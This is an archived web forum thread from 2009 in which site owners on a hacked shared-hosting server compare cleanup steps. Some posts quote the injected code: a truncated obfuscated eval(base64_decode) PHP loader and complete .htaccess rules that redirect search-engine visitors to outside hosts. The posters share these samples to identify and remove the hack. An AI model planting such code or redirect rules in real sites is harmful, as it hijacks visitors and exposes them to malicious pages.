kokako, same procedure: report to MT, change passwords, check local computer for viruses and malware, replace all files with know good copies of EE, upgrading to the latest version/build in the process.
This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.
The active forums are here.
November 10, 2009 8:54am
Subscribe [9]#31 / Nov 11, 2009 6:02am
kokako, same procedure: report to MT, change passwords, check local computer for viruses and malware, replace all files with know good copies of EE, upgrading to the latest version/build in the process.
#32 / Nov 11, 2009 12:18pm
I’m also on the affected MT grid server. I could only find injected code in all my index.php files (root level) and .htaccess files (root level). I changed passwords and removed the code. Everything seems to be good now. I’m still waiting to hear back from MT on how the hackers gained access… Will report back if I hear anything.
#33 / Nov 11, 2009 3:25pm
Please do. We have no reason to believe that EE was involved in these attacks, but we definitely like to stay on top of things in matters of security.
#34 / Nov 11, 2009 3:33pm
No, I don’t think EE was either. Actually, I believe it was targeted at Wordpress installs. The script/attacker injected the code right in the middle of the index.php file after a </body> tag in a PHP statement. As far as I can tell it didn’t get into anything else. The PHP error actually did us a favor in recognizing that the file had been modified.
#35 / Nov 11, 2009 3:46pm
Yes. From the reports we’ve had so far, it looks like the attackers had FTP login information, so that’s something to bear in mind. As I’ve said, the ball really is in MT’s court here.
#36 / Nov 11, 2009 3:50pm
Yes, absolutely, the ball is in MT’s court. Just posted here for reference.
#37 / Nov 11, 2009 3:53pm
Very good. Let’s just wait what they have to say, then.
#38 / Nov 11, 2009 6:30pm
what is the code that was injected in .htaccess? I know the code injected into the index.php file looked like: <!—5edfgh345—><?php eval(base64_decode(“JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5r ...
but what does it look like in .htaccess?
thanks
#39 / Nov 11, 2009 6:34pm
what is the code that was injected in .htaccess?
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* <a href="http://you-search.in/in.cgi?4¶meter=sf">http://you-search.in/in.cgi?4¶meter=sf</a> [R,L]#40 / Nov 11, 2009 6:37pm
that was fast. just the orange text then? mine looked like this:
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* <a href="http://allvideo.org.uk/in.cgi?4¶meter=sf">http://allvideo.org.uk/in.cgi?4¶meter=sf</a> [R,L]So in my case the code injected was just:
RewriteRule .* <a href="http://allvideo.org.uk/in.cgi?4¶meter=sf">http://allvideo.org.uk/in.cgi?4¶meter=sf</a> [R,L] ?#41 / Nov 11, 2009 6:38pm
No, not just the orange text. Everything I posted was injected.
#42 / Nov 11, 2009 6:43pm
thanks. much appreciated.
#43 / Nov 11, 2009 7:09pm
Hi-
Just curious to se if you all received any word on this issue from Media Temple? Thanks!
#44 / Nov 11, 2009 7:17pm
@Adam - Still waiting…
#45 / Nov 11, 2009 7:25pm
OK, thanks. We definitely appreciate your effort on this one 😊